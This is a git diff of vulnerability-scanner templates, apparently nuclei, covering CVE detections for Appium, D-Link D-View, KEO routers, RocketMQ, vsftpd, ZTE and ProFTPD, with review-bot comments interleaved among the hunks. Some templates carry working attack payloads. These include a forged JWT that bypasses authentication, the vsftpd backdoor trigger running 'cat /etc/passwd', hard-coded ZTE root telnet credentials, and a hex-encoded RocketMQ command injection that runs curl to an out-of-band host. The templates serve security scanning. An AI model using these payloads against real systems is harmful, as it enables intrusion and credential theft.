diff --git a/.new-additions b/.new-additions index 702c5ee701..c08a9ca12d 100644 --- a/.new-additions +++ b/.new-additions @@ -1,12 +1,15 @@ +http/cves/2023/CVE-2023-2479.yaml http/cves/2023/CVE-2023-2766.yaml http/cves/2023/CVE-2023-36845.yaml http/cves/2023/CVE-2023-42442.yaml http/cves/2023/CVE-2023-4568.yaml +http/cves/2023/CVE-2023-5074.yaml http/exposures/tokens/jotform/jotform-api-key.yaml http/misconfiguration/installer/akeeba-installer.yaml http/misconfiguration/installer/alma-installer.yaml http/misconfiguration/installer/bitrix24-installer.yaml http/misconfiguration/installer/gibbon-installer.yaml +http/misconfiguration/installer/klr300n-installer.yaml http/misconfiguration/installer/mantisbt-installer.yaml http/misconfiguration/installer/ojs-installer.yaml http/misconfiguration/installer/zabbix-installer.yaml diff --git a/cves.json b/cves.json index 78099bc39d..90a1d52a17 100644 --- a/cves.json +++ b/cves.json 
@@ -1915,6 +1915,7 @@ {"ID":"CVE-2023-24733","Info":{"Name":"PMB 7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB 7.4.6 contains a cross-site scripting vulnerability via the query parameter at /admin/convert/export_z3950_new.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24733.yaml"} {"ID":"CVE-2023-24735","Info":{"Name":"PMB 7.4.6 - Open Redirect","Severity":"medium","Description":"PMB v7.4.6 contains an open redirect vulnerability via the component /opac_css/pmb.php. An attacker can redirect a user to an external domain via a crafted URL and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24735.yaml"} {"ID":"CVE-2023-24737","Info":{"Name":"PMB v7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the 'query' parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24737.yaml"} +{"ID":"CVE-2023-2479","Info":{"Name":"Appium Desktop Server - Remote Code Execution","Severity":"critical","Description":"OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2479.yaml"} {"ID":"CVE-2023-25135","Info":{"Name":"vBulletin \u003c= 5.6.9 - Pre-authentication Remote Code Execution","Severity":"critical","Description":"vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. 
This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25135.yaml"} {"ID":"CVE-2023-25157","Info":{"Name":"GeoServer OGC Filter - SQL Injection","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25157.yaml"} {"ID":"CVE-2023-25346","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-25346.yaml"} 
@@ -2000,6 +2001,7 @@ {"ID":"CVE-2023-36289","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36289.yaml"} {"ID":"CVE-2023-36346","Info":{"Name":"POS Codekop v2.0 - Cross Site Scripting","Severity":"medium","Description":"POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36346.yaml"} {"ID":"CVE-2023-36844","Info":{"Name":"Juniper Devices - Remote Code Execution","Severity":"medium","Description":"Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. 
Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-36844.yaml"} +{"ID":"CVE-2023-36845","Info":{"Name":"Juniper J-Web - Remote Code Execution","Severity":"medium","Description":"A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables to execute remote commands\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-36845.yaml"} {"ID":"CVE-2023-36934","Info":{"Name":"MOVEit Transfer - SQL Injection","Severity":"critical","Description":"In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-36934.yaml"} {"ID":"CVE-2023-37265","Info":{"Name":"CasaOS \u003c 0.4.4 - Authentication Bypass via Internal IP","Severity":"critical","Description":"CasaOS is an open-source Personal Cloud system. Due to a lack of IP address verification an unauthenticated attackers can execute arbitrary commands as `root` on CasaOS instances. The problem was addressed by improving the detection of client IP addresses in `391dd7f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. 
If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37265.yaml"} {"ID":"CVE-2023-37266","Info":{"Name":"CasaOS \u003c 0.4.4 - Authentication Bypass via Random JWT Token","Severity":"critical","Description":"CasaOS is an open-source Personal Cloud system. Unauthenticated attackers can craft arbitrary JWTs and access features that usually require authentication and execute arbitrary commands as `root` on CasaOS instances. This problem was addressed by improving the validation of JWTs in commit `705bf1f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37266.yaml"} 
@@ -2030,6 +2032,7 @@ {"ID":"CVE-2023-4568","Info":{"Name":"PaperCut NG Unauthenticated XMLRPC Functionality","Severity":"medium","Description":"PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-4568.yaml"} {"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"} {"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. 
The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"} +{"ID":"CVE-2023-5074","Info":{"Name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","Severity":"critical","Description":"Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5074.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} {"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 8d2d832d28..554cdd5d98 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -39c60027acb5b66e6e4bb6ad252d317f +6746b8c9a4fa68a5263fab717bdaed2f 
diff --git a/helpers/wordpress/plugins/admin-menu-editor.txt b/helpers/wordpress/plugins/admin-menu-editor.txt
index b0f61c56dd..0c9cb69569 100644
--- a/helpers/wordpress/plugins/admin-menu-editor.txt
+++ b/helpers/wordpress/plugins/admin-menu-editor.txt
@@ -1 +1 @@
-1.11.1
\ No newline at end of file
+1.11.2
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/astra-sites.txt b/helpers/wordpress/plugins/astra-sites.txt
index a423d4217b..8a0feb98ca 100644
--- a/helpers/wordpress/plugins/astra-sites.txt
+++ b/helpers/wordpress/plugins/astra-sites.txt
@@ -1 +1 @@
-3.4.2
\ No newline at end of file
+3.4.3
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/pixelyoursite.txt b/helpers/wordpress/plugins/pixelyoursite.txt
index 6a79ddb31f..4986c931ad 100644
--- a/helpers/wordpress/plugins/pixelyoursite.txt
+++ b/helpers/wordpress/plugins/pixelyoursite.txt
@@ -1 +1 @@
-9.4.5.1
\ No newline at end of file
+9.4.6
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/premium-addons-for-elementor.txt b/helpers/wordpress/plugins/premium-addons-for-elementor.txt
index 7491cf3bcc..4843910948 100644
--- a/helpers/wordpress/plugins/premium-addons-for-elementor.txt
+++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt
@@ -1 +1 @@
-4.10.9
\ No newline at end of file
+4.10.10
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/sg-cachepress.txt b/helpers/wordpress/plugins/sg-cachepress.txt
index 6b0e58e78f..cb1d6217e1 100644
--- a/helpers/wordpress/plugins/sg-cachepress.txt
+++ b/helpers/wordpress/plugins/sg-cachepress.txt
@@ -1 +1 @@
-7.4.1
\ No newline at end of file
+7.4.2
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/sg-security.txt b/helpers/wordpress/plugins/sg-security.txt
index 03e5161d2c..7b5753f55b 100644
--- a/helpers/wordpress/plugins/sg-security.txt
+++ b/helpers/wordpress/plugins/sg-security.txt
@@ -1 +1 @@
-1.4.5
\ No newline at end of file
+1.4.6
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt
index 4be2c727ad..3d5762e858 100644
--- a/helpers/wordpress/plugins/woocommerce-payments.txt
+++ b/helpers/wordpress/plugins/woocommerce-payments.txt
@@ -1 +1 @@
-6.5.0
\ No newline at end of file
+6.5.1
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt
index 7e541aec69..a6254504e4 100644
--- a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt
+++ b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt
@@ -1 +1 @@
-2.2.2
\ No newline at end of file
+2.3.1
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-2479.yaml b/http/cves/2023/CVE-2023-2479.yaml
new file mode 100644
index 0000000000..5339dfe1c3
--- /dev/null
+++ b/http/cves/2023/CVE-2023-2479.yaml
@@ -0,0 +1,48 @@
+id: CVE-2023-2479
+
+info:
+ name: Appium Desktop Server - Remote Code Execution
+ author: zn9988
+ severity: critical
+ description: |
+ OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-2479
+ - https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4/
+ remediation: Fixed in v1.22.3-4
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2023-2479
+ cwe-id: CWE-78
+ cpe: cpe:2.3:a:appium:appium-desktop:*:*:*:*:*:*:*:*
+ epss-score: 0.0008
+ metadata:
+ max-request: 1
+ tags: cve,cve2023,appium,oast,rce
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?url='
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'The requested resource could not be found, or a request was received using an HTTP method that is not supported by the mapped resource'
+
+ - type: word
+ part: header
+ words:
+ - 'application/json'
+
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "dns"
+
+ - type: status
+ status:
+ - 404
diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml
new file mode 100644
index 0000000000..d6b876e592
--- /dev/null
+++ b/http/cves/2023/CVE-2023-5074.yaml
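Review bot: In CVE-2023-2479.yaml the request path as shown ends at `'{{BaseURL}}/?url='` and nothing in the hunk references `{{interactsh-url}}`, yet the third matcher requires `interactsh_protocol` to contain `dns` under `matchers-condition: and`. If the parameter really is empty, no out-of-band interaction can be tied to the request and the template can never report a finding; the value may simply have been lost when this page was rendered, so verify against the file itself. Separately, a check that makes the target perform an external lookup is normally tagged `intrusive`, as CVE-2023-33246 in this same commit is, so `tags: cve,cve2023,appium,oast,rce,intrusive` would let operators exclude it from passive scans. The wildcard `cpe` would also benefit from a comment such as `# affected: appium-desktop before v1.22.3-4`.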
@@ -0,0 +1,44 @@
+id: CVE-2023-5074
+
+info:
+ name: D-Link D-View 8 v2.0.1.28 - Authentication Bypass
+ author: DhiyaneshDK
+ severity: critical
+ description: |
+ Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28
+ remediation: |
+ Upgrade to the latest version to mitigate this vulnerability.
+ reference:
+ - https://www.tenable.com/security/research/tra-2023-32
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-5074
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2023-0563
+ cwe-id: CWE-798
+ epss-score: 0.00563
+ epss-percentile: 0.74832
+ cpe: cpe:2.3:a:dlink:d-view_8:2.0.1.28:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: http.favicon.hash:-1317621215
+ fofa-query: icon_hash="-1317621215"
+ vendor: dlink
+ product: d-view_8
+ tags: cve,cve2023,d-link,auth-bypass
+
+http:
+ - raw:
+ - |
+ GET /dview8/api/usersByLevel HTTP/1.1
+ Host: {{Hostname}}
+ Authorization: eyJhbGciOiAiSFMyNTYiLCJ0eXAiOiAiand0In0.eyJvcmdJZCI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODA5YWEiLCJ1c2VySWQiOiAiNTkxNzFkNTYtZTZiNC00Nzg5LTkwZmYtYTdhMjdmZDQ4NTQ4IiwidHlwZSI6IDMsImtleSI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODkwYmIiLCJpYXQiOiAxNjg2NzY1MTk4LCJqdGkiOiAiZmRhOGU1YzNlNWY1MTQ5MDMzZThiM2FkNWI3ZDhjMjUiLCJuYmYiOiAxNjg2NzYxNTk4LCJleHAiOiAxODQ0NDQ1MTk4fQ.5swhQdiev4r8ZDNkJAFVkGfRTIaUQlwVue2AI18CrcI
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code == 200'
+ - 'contains(body, "userName") && contains(body, "passWord") && contains(body, "isEmailActivate")'
+ - 'contains(header, "application/json")'
+ condition: and
diff --git a/http/misconfiguration/installer/klr300n-installer.yaml b/http/misconfiguration/installer/klr300n-installer.yaml
new file mode 100644
index 0000000000..b17ed06001
--- /dev/null
+++ b/http/misconfiguration/installer/klr300n-installer.yaml
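Review bot: In CVE-2023-5074.yaml the classification line `cve-id: CVE-2023-0563` does not match the template `id`, the file name or the NVD reference, which all say CVE-2023-5074; it should read `cve-id: CVE-2023-5074`, otherwise anything that filters or reports on the classification field attributes findings to the wrong CVE. The `Authorization` header carries a long pre-signed token with no explanation, and the token appears to embed a fixed `exp` claim, so a comment such as `# token signed with the product's static key (TRA-2023-32); stops matching once its exp claim passes` would tell maintainers why it is hard-coded and when the check goes stale. The matcher keys on `passWord` in the body, so a positive result means account records were returned to the scanner and stored responses should be treated as sensitive. The description also has a wording slip ("can allow an for an").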
@@ -0,0 +1,36 @@
+id: klr300n-install
+
+info:
+ name: KLR 300N Router - Exposed Installation
+ author: andreluna
+ severity: high
+ description: |
+ Home router wireless KLR 300N setup page were Detected.
+ reference:
+ - http://www.keo.com.br/produtos/roteador-klr-300n
+ - http://www.keo.com.br/wp-content/uploads/2017/09/Manual_KLR_300N_03-17_site.pdf
+ metadata:
+ max-request: 1
+ verified: true
+ shodan-query: html:"def_wirelesspassword"
+ tags: keo,klr300n,misconfig,exposure,iot,install
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ host-redirects: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Roteador Wireless KLR 300N"
+ - "def_wirelesspassword"
+ - "Installation assitance"
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 6bd95ec077..41baa25eb7 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -1,7 +1,7 @@ id: wordpress-sg-cachepress info: - name: SiteGround Optimizer Detection + name: Speed Optimizer – The All-In-One WordPress Performance-Boosting Plugin Detection author: ricardomaia severity: info reference:
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 1fd64a5279..ee389af6ec 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -1,7 +1,7 @@ id: wordpress-sg-security info: - name: All-inclusive Security Solution by SiteGround Detection + name: Security Optimizer – The All-In-One WordPress Protection Plugin Detection author: ricardomaia severity: info reference:
diff --git a/network/backdoor/backdoored-zte.yaml b/network/backdoor/backdoored-zte.yaml
index 699a27b60b..fe8cf86de6 100644
--- a/network/backdoor/backdoored-zte.yaml
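Review bot: In klr300n-installer.yaml the template `id` is `klr300n-install`, while the file name and the sibling installer files listed in `.new-additions` use the `-installer` form; `id: klr300n-installer` would keep lookups by id and by path consistent. The description only states that the setup page was detected ("were Detected" should read "was detected") and does not explain why that is `severity: high`; one sentence on what an unauthenticated visitor can do from that page would justify the rating. Both the shodan query and the body matcher key on `def_wirelesspassword`, which suggests the page discloses a default wireless password; if that is the case, say so in the description so triage does not have to infer it.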
+++ b/network/backdoor/backdoored-zte.yaml @@ -10,19 +10,18 @@ info: - https://www.exploit-db.com/ghdb/7179 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-912 metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: http.html:"ZTE Corporation" + verified: true tags: edb,network,zte,telnet,backdoor,router tcp: - host: - "{{Hostname}}" - - "{{Host}}:23" - + port: 23 inputs: - data: "root\r\n" - data: "Zte521\r\n\r\n" diff --git a/network/backdoor/vsftpd-backdoor.yaml b/network/backdoor/vsftpd-backdoor.yaml index e8195a5bff..953a380eb8 100644 --- a/network/backdoor/vsftpd-backdoor.yaml +++ b/network/backdoor/vsftpd-backdoor.yaml @@ -7,23 +7,22 @@ info: description: VSFTPD 2.3.4 contains a backdoor command execution vulnerability. reference: - https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/ + remediation: This backdoor was removed on July 3rd, 2011. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-78 - remediation: This backdoor was removed on July 3rd, 2011. - tags: network,vsftpd,ftp,backdoor metadata: - max-request: 2 + max-request: 1 + tags: network,vsftpd,ftp,backdoor tcp: - inputs: - data: "USER anonymous\r\nPASS anonymous\r\n" host: - - "{{Host}}:21" - "{{Hostname}}" - + port: 21 matchers: - type: word words: diff --git a/network/cves/2001/CVE-2001-1473.yaml b/network/cves/2001/CVE-2001-1473.yaml index eceb3e855e..003c9d7137 100644 --- a/network/cves/2001/CVE-2001-1473.yaml +++ b/network/cves/2001/CVE-2001-1473.yaml 
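Review bot: In backdoored-zte.yaml the second target `"{{Host}}:23"` is replaced by the single `"{{Hostname}}"` entry plus `port: 23`, and `max-request` drops from 2 to 1; vsftpd-backdoor.yaml and the other network/ templates in this commit get the same edit. As far as the hunk shows, an input that carries its own port is now contacted once instead of on both that port and 23, so whether the telnet check still reaches port 23 for such inputs depends on how the engine resolves `port`, presumably as a default only. A short comment beside the field, for example `# default port; used when the input carries none`, would make that coverage change explicit for anyone feeding these templates URL lists. The `inputs` block continues outside the hunk.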
@@ -5,28 +5,28 @@ info: author: iamthefrogy severity: high description: SSHv1 is deprecated and has known cryptographic issues. - remediation: Upgrade to SSH 2.4 or later. reference: - https://www.kb.cert.org/vuls/id/684820 - https://nvd.nist.gov/vuln/detail/CVE-2001-1473 - http://www.kb.cert.org/vuls/id/684820 - https://exchange.xforce.ibmcloud.com/vulnerabilities/6603 + remediation: Upgrade to SSH 2.4 or later. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2001-1473 cwe-id: CWE-310 - epss-score: 0.00258 cpe: cpe:2.3:a:ssh:ssh:1.2.24:*:*:*:*:*:*:* + epss-score: 0.00258 metadata: - max-request: 2 - vendor: ssh + max-request: 1 product: ssh + vendor: ssh tags: cve,cve2001,network,ssh,openssh tcp: - host: - "{{Hostname}}" - - "{{Host}}:22" + port: 22 matchers: - type: word words: diff --git a/network/cves/2011/CVE-2011-2523.yaml b/network/cves/2011/CVE-2011-2523.yaml index eaecc8b8c0..8fb474a7fb 100644 --- a/network/cves/2011/CVE-2011-2523.yaml +++ b/network/cves/2011/CVE-2011-2523.yaml @@ -34,7 +34,8 @@ variables: cmd: "cat /etc/passwd" # shows the the user and group names and numeric IDs tcp: - host: - - "{{Host}}:21" + - "{{Hostname}}" + port: 21 inputs: - data: "USER letmein:)\r\nPASS please\r\n" read: 100 diff --git a/network/cves/2015/CVE-2015-3306.yaml b/network/cves/2015/CVE-2015-3306.yaml index 7211249079..3c2d3d5a03 100644 --- a/network/cves/2015/CVE-2015-3306.yaml +++ b/network/cves/2015/CVE-2015-3306.yaml 
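Review bot: In CVE-2011-2523.yaml the host entry changes from `"{{Host}}:21"` alone to `"{{Hostname}}"` with `port: 21`, which is not the same edit as in the sibling templates, where `{{Hostname}}` was already listed. On the old side the login trigger and `cmd` were only ever sent to port 21; on the new side they presumably go to whatever port the input names, with 21 as the fallback. For a template that activates a backdoor and runs a command, that widening deserves an explicit comment, e.g. `# port 21 is the default; an input with its own port is probed on that port instead`, and a check that the tags, which are outside this hunk, include `intrusive`. The `inputs` block continues past the hunk.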
@@ -14,22 +14,23 @@ info: - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.html - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.html - https://nvd.nist.gov/vuln/detail/CVE-2015-3306 + remediation: Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C cvss-score: 10 cve-id: CVE-2015-3306 cwe-id: CWE-284 - epss-score: 0.97267 cpe: cpe:2.3:a:proftpd:proftpd:1.3.5:*:*:*:*:*:*:* + epss-score: 0.97267 metadata: - max-request: 2 - vendor: proftpd + max-request: 1 product: proftpd + vendor: proftpd tags: cve,cve2015,ftp,rce,network,proftpd,edb tcp: - host: - "{{Hostname}}" - - "{{Host}}:21" + port: 21 inputs: - data: "site cpfr /proc/self/cmdline\r\n" read: 1024 diff --git a/network/cves/2023/CVE-2023-33246.yaml b/network/cves/2023/CVE-2023-33246.yaml index ec7b896b13..85d351c418 100644 --- a/network/cves/2023/CVE-2023-33246.yaml +++ b/network/cves/2023/CVE-2023-33246.yaml 
@@ -15,20 +15,21 @@ info: - http://packetstormsecurity.com/files/173339/Apache-RocketMQ-5.1.0-Arbitrary-Code-Injection.html - http://www.openwall.com/lists/oss-security/2023/07/12/1 - https://lists.apache.org/thread/1s8j2c8kogthtpv3060yddk03zq0pxyp + remediation: Update the RocketMQ application to version 5.1.1 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-33246 cwe-id: CWE-94 - epss-score: 0.95581 cpe: cpe:2.3:a:apache:rocketmq:*:*:*:*:*:*:*:* + epss-score: 0.95581 metadata: - verified: true - max-request: 2 - vendor: apache + fofa-query: protocol="rocketmq" + max-request: 1 product: rocketmq shodan-query: title:"RocketMQ" - fofa-query: protocol="rocketmq" + vendor: apache + verified: true tags: cve,cve2023,rocketmq,rce,oast,intrusive,network variables: part_a: '{{ hex_decode ("000000d2000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f206375726c20") }}' @@ -36,7 +37,8 @@ variables: tcp: - host: - "{{Hostname}}" - - "{{Host}}:10911" + port: 10911 + inputs: - data: '{{ part_a + "{{interactsh-url}}" + "/////////////" + part_b }}' read: 1024 diff --git a/network/default-login/ftp-anonymous-login.yaml b/network/default-login/ftp-anonymous-login.yaml index 3c210d02b5..4888a5170b 100644 --- a/network/default-login/ftp-anonymous-login.yaml +++ b/network/default-login/ftp-anonymous-login.yaml 
@@ -4,13 +4,13 @@ info: name: FTP Anonymous Login author: C3l3si4n,pussycat0x severity: medium - reference: - - https://tools.ietf.org/html/rfc2577 description: | Anonymous FTP access allows anyone to access your public_ftp folder, allowing unidentified visitors to download (and possibly upload) files on your website. Anonymous FTP creates the potential for a security hole for hackers and is not recommended. - tags: network,ftp,default-login + reference: + - https://tools.ietf.org/html/rfc2577 metadata: - max-request: 2 + max-request: 1 + tags: network,ftp,default-login tcp: - inputs: @@ -20,8 +20,8 @@ tcp: read: 1024 host: - - "{{Host}}:21" - "{{Hostname}}" + port: 21 matchers-condition: and matchers: diff --git a/network/default-login/ftp-weak-credentials.yaml b/network/default-login/ftp-weak-credentials.yaml index 696970bf22..8e8ae5c1c2 100644 --- a/network/default-login/ftp-weak-credentials.yaml +++ b/network/default-login/ftp-weak-credentials.yaml @@ -8,11 +8,11 @@ info: reference: - https://docs.microsoft.com/en-us/iis/configuration/system.applicationhost/sites/sitedefaults/ftpserver/security/authentication/ classification: - cvss-score: 8.5 cvss-metrics: 3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N - tags: network,ftp,default-login,service + cvss-score: 8.5 metadata: - max-request: 2 + max-request: 1 + tags: network,ftp,default-login,service tcp: @@ -21,7 +21,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:21" + port: 21 attack: clusterbomb payloads: diff --git a/network/default-login/ldap-anonymous-login.yaml b/network/default-login/ldap-anonymous-login.yaml index aae1a43689..48d4b0e1d8 100644 --- a/network/default-login/ldap-anonymous-login.yaml +++ b/network/default-login/ldap-anonymous-login.yaml @@ -13,9 +13,9 @@ 